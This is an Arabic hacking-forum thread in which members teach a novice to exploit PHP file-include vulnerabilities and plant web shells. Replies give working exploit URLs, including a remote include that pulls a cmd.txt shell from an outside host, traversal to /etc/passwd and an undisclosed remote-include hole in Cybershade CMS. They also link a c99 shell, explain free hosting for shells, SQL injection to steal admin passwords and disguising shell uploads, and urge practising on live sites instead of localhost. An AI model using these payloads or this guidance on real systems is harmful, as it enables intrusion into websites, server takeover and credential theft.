السلام عليكم يا إخوان

لدي 3 استفسارات المرجو أن تجيبوني عليهم .

الأول : أنا أنا أحمل سكريبتات و أبحث عن ثغرات الفايل أنكلود و أجد بعض الثغرات و أريد أن أجرب عليها رفع الشيل لكن لا أعرف كيف أفتحها على جهازي( يعني أجرب الثغرة في لوكال هوست )

+ طريقة استعماله و كيف أدخل للثغراات من خلاله ...
الثاني : كيف أضع دورك لثغرات فايل أنكلود حتى أبحث عنه في قوقل

الثالث : كيف أرفع شيل بصيغة txt على استضافة مجانية لكي أستعمله

و شكراا لكم مسبقاا
و السلام خير ختااام

سااااااااااااااعدوووووووو وووووووووني بليز

اي مساعده او اي شي رجاء على ايميلي>>>[email protected] <<ايميلي الجديد طبعن

أين أنتم يا شباب المنتدى هل من مساعدة

بسم الله الرحمن الرحيم


كيفك أخي




شرح استغلال ثغرات الفايل انكلود


ما هي ثغرات الفايل انكلود


هذه الثغرات عبارة عن تطبيق اكواد عبر ادخال ملفات باستخدام دوال معينة تكون مستخدمة بالسكربت لتطبيق اوامر اخرى ..


الدوال التي يمكن استغلالها لتطبيق الفايل انكلود


كود:


include
require
include_once
require_once




ما هو عمل هذه الدوال


هذه الدوال تقوم بتطبيق محتوي ملف معين كملف برمجي ..


اي ادخال الاكواد من ملفات خارجية .. ولا يخلى اي سكريبت من احد هذه الدوال


ولكن تكون الثغرة في استخدام المتغيرات داخل هذه الدوال وامكانية التعديل على المتغير


انواع ثغرات ال File include


هذا النوع ينقسم الى قسمين :-


1 : Remote File Include :-
وهو عملية تطبيق كود من ملف اي ملف وليس بالشرط ان يكون على نفس السيرفر .. اي يمكن تطبيق اكواد اي ملف اخر .. دون اي مشاكل


2: Local File include :-
وهي امكانية تطبيق كود اي ملف اخر من على نفس السيرفر


كيف يتم اكتشاف ثغرات الفايل انكلود ؟


طبعا لكي تكتشف ثغرات الفايل انكلود يجب عليك البحث بالشفرة المصدرية او الكود للسكربتات ..


وهذا الكود مثال على ثغرات الفايل انكلود

كود:


<?php


$page = $_GET['page'];


include ($page);


?>




وفي هذه الحالة يتم تطبيق الثغرة بكل سهولة على الملف باستخدام المتغير page


ففي هذه الحالة يكون الاستغلال مثلا
file.php?page=****l.txt


او اي ملف اخر مثلا


file.php?page=http://members.lycos.co.uk/soqor10/cmd.txt&cmd=id


اما لو كان الكود مثلا


كود:
<?php


$page = $_GET['page'];


include ("./pages/$page");


?>




فهنا يمكن فقط ادخال ملفات داخلية اي على نفس السيرفر


وطبعا يمكن استخدام النقاط بشكل طبيعي لتخطي المجلدات


مثلا لو كان مسار الملف
/home/user/public_html/file.php


يكون الاستغلال للوصول لل /etc/passwd


file.php?page=../../../../etc/passwd


او مثلا لو قمت برفع ملف شل بامتداد gif على مركز رفع على نفس السيرفر


واكن مسار الملف /home/upload/public_html/uploads/file01c144dd.gif


تدخله بالطريقة التالية


file.php?page=../../../../home/upload/public_html/uploads/file01c144dd.gif


تطبيق عملي على اكتشاف ثغرات ال file include


والثغرة لم ترقع ولم تنشر حتى الان


اسم السكربت
Cybershade CMS


يمكنك تحميل السكربت منwww.sf.net (http://www.sf.net)


انا بالعادة عندما افحص سكربت من الثغرات ابدأ بملفات ال core او ال includes اي الملفات التي تدرج دوما في كل الملفات ولا تكون رئيسية لانها بالغالب يكون بها الثغرات


لذا سنقوم بفتح ملف core/includes.php


محتوى الملف
كود:

<?php
//This file has the main includes all in one file, this will enable us to change the files if we need to
include "xconnect.php"; //connection infomation
include $CMS_ROOT."core/core.php"; //main core of the CMS
include $CMS_ROOT."core/security.php"; //CMS security
include $CMS_ROOT."core/menus.php"; //Menus
include $CMS_ROOT."core/classes.php"; //Diffrent Classes
//include $CMS_ROOT."core/bbcode.php"; //bbcodes
template(); //call upon the template function
?>




ولكن الملف xconnect.php غير موجود بنفس المجلد لذا سيظهر رسالة خطأ ولكن لان الدالة هي Include فانه يكمل دون التوقف للخطأ وهنا يمكننا استغلال هذا الخطأ



انظر
كود:




include $CMS_ROOT."core/core.php"; //main core of the CMS




ولان هذا الملف لا يوجد فيه اي شيء قبل هذا السطر او لا يقوم بتطبيق شيء بشكل حقيقي اذا يمكننا اضافة قيمة للمتغير CMS_ROOT


لذا لو قمنا بعمل مثلا
core/includes.php?CMS_ROOT=http://www.soqor.net/index/?


فانه سيقوم بادراج الصفحة .. وهنا يمكننا استخدام اي شيل بصيغة gif او txt


ويمكن ايضا النظر مثلا في ملف اخر ك core.php


اول اسطر فيه
كود:




<?php
session_start();
error_reporting (E_ERROR | E_WARNING | E_PARSE); //this will be set to 0 when released, this is to stop any error's showing up
//error_reporting (0);
include $CMS_ROOT."core/base_functions.php"; //functions that the CMS will use




وايضا لا يوجد شيء قبل CMS_ROOT اذا اذا قمنا بتعيين قيمة لهذا المتغير فانه سيمكننا ادراج شيل على الصفحة



وطبعا هذا النوع من الثغرات يعتمد بشكل رئيسي على القدرة على قراءة الاكواد والصبر



====================
لازم يكون لديك شيل بصيغة txt
c99.txt واعتقد يوجد منه في المنتدى

وبعد ضلك تدخل على جوجل وتبحث على إستضافة مجانية

وتحجز لك إستضافة

هذه إستضافة مجانية
http://www.free-web-host.me/ (http://www.free-web-host.me/)
أو هذه
2KMegs.com - Free reliable cPanel web hosting - 2 Gigs of disk space, 5 Gigs of bandwidth, cPanel control panel, mail, and more! 2kmegs offers great uptime and support for your website. (http://www.2kmegs.com/)

بعد حجز موقعك ترفع الشيل

مثل إسم موقعك
www.xxx.com (http://www.xxx.com)

ورفعته الشيل

يصير هكذا
www.xxx.com/c99.txt (http://www.xxx.com/c99.txt)
هكذا أنت رفعت شيل txt

إنتهينا

إذا لا تعرف الرفع على السي بانل إرفع على ال ftp

أخي المدير أنا فهمت بعض الأشياء و أخرى لا و بمن الأشياء التي لم أفهمها هي :
1) الأول :

اما لو كان الكود مثلا


كود:
<?php



$page = $_GET['page'];

الموضوع الأصلى من هنا: منتديات جيوش الهكرز http://www.aljyyosh.com/vb/f19/2475/

include ("./pages/$page");


?>




فهنا يمكن فقط ادخال ملفات داخلية اي على نفس السيرفر


وطبعا يمكن استخدام النقاط بشكل طبيعي لتخطي المجلدات


مثلا لو كان مسار الملف
/home/user/public_html/file.php


يكون الاستغلال للوصول لل /etc/passwd


file.php?page=../../../../etc/passwd


او مثلا لو قمت برفع ملف شل بامتداد gif على مركز رفع على نفس السيرفر


واكن مسار الملف /home/upload/public_html/uploads/file01c144dd.gif


تدخله بالطريقة التالية


file.php?page=../../../../home/upload/public_html/uploads/file01c144dd.gif


2) الثاني : بعد ما أفحص السكريبت و وجدت ثغرة سيبقى لي أن أجربها و أرفع عليها الشيل

لكن كيف سأفعل هذااا . لهذا كنت أسأل عن localhost . هل سأستعمله هنا و كيف ذلك ؟؟

أخي العزيز انا أنصحك تبحث عن ثغرة وتجرب عليها وليس على ال localhost


تذكر ان ثغرات الانكلود تتكون من ( السكربت المصاب / مكان المجلد / الصفحة التى يوجد بها المتغير الى يسمح بربط الشل )



www.xxxx.com/Folder/pag.php?incloud=you****l.txt (http://www.xxxx.com/Folder/pag.php?incloud=you****l.txt)?


الموقع = www.xxx.com (http://www.xxx.com/)

مجلد السكربت = Folder

الصفحة التى فيها المتغير الى يسمح لنا بجلب ملف خارجى = pag.php (http://www.xxxx.com/Folder/pag.php?incloud=you****l.txt)

المتغير الى نربط به الملف الخارجى ( الشل ) incloud (http://www.xxxx.com/Folder/pag.php?incloud=you****l.txt)

علامة =

الشل بصغية تكتس = you****l.txt (http://www.xxxx.com/Folder/pag.php?incloud=you****l.txt)

وعلامة ؟





وهو .. كيف اعرف ثغرات الانكلود ... او كيف اعرف الاستغلال لثغرة ...

راح نقولك يا اخى العزيز .. انه فى مواقع سيكورتى خاصة تعرض لك اخر الثغرات المكتشفة بالاضافة الى طريقة الاستغلال


من هذه المواقع http://milw0rm.com (http://milw0rm.com/) وكذلك http (http://securityfocus.com/)://securityfocus.com (http://securityfocus.com/)


طيب ناخذ مثال من المواقع السيكورتى ... http://milw0rm.com/webapps.php (http://milw0rm.com/webapps.php) ونبحث عن الثغرات الفايل الانكلود
هذا مثال على الثغرة http://milw0rm.com/exploits/4607 (http://milw0rm.com/exploits/4607)

http://www7.0zz0.com/2009/03/19/08/671575454.jpg (http://www7.0zz0.com/2009/03/19/08/671575454.jpg)



http://www7.0zz0.com/2009/03/19/08/599945550.jpg (http://www7.0zz0.com/2009/03/19/08/599945550.jpg)

وهذا رابط شيل c99
http://m4nn3r.by.ru/c99.txt (http://m4nn3r.by.ru/c99.txt)?
النوع الثاني من الثغرات
ثغرات قواعد البيانات (( Remote SQL Injection Vulnerability )) ويقصد بها الثغرات التى تتح لنا معرفة معلومات لمجموعه معنية // علي سبيل المثال معرفه اسم الدخول وكلمة المرور لمدير الموقع
وتعرف هذا الثغرة باسم SQL واستعملها سهل جداا .. تضع الاستغلال على المتصفح الانترنيت اكسلبور .. وتلاحظ الباس
وغالبا يكون الباس مشفر MD5 وهناك الكثير من المواقع الى تفك التشفير ...

ناخذ مثال على هذا النوع http://milw0rm.com/exploits/4620 (http://milw0rm.com/exploits/4620)



http://www7.0zz0.com/2009/03/19/08/149466130.jpg (http://www7.0zz0.com/2009/03/19/08/149466130.jpg)




النوع الثالث ثغرات الرفع ( ثغرات مراكز التحميل ) وهى تقريبا اسهل انواع الثغرات .. فقط تقوم برفع الشل
شاهد معى الصورة يقول لك ادارج الملف ثم اضغط على الابلود بمعنى رفع ... وغلبااا نحتاج الى خداع المركز
فى الامتداد بحث يكون ا متداد الشل الى نسخدمه هكذا C99.php.rar


http://www7.0zz0.com/2009/03/19/08/163154018.jpg (http://www7.0zz0.com/2009/03/19/08/163154018.jpg)


تحياتي وإن شاء اللهتكون فهمت الشرح

شكراا لك أخي العزيز شرح وافي و كافي

لكن أنا مازلت أبحث عن كيف أستعمل اللوكال هوست لكي أعرض الثغراات على جهازي و أشوف هل هي صالحة لرفع الشيل أم لا

فهمت يا اخوي المدير ما قصر في شرحه والله يعطيه العافيه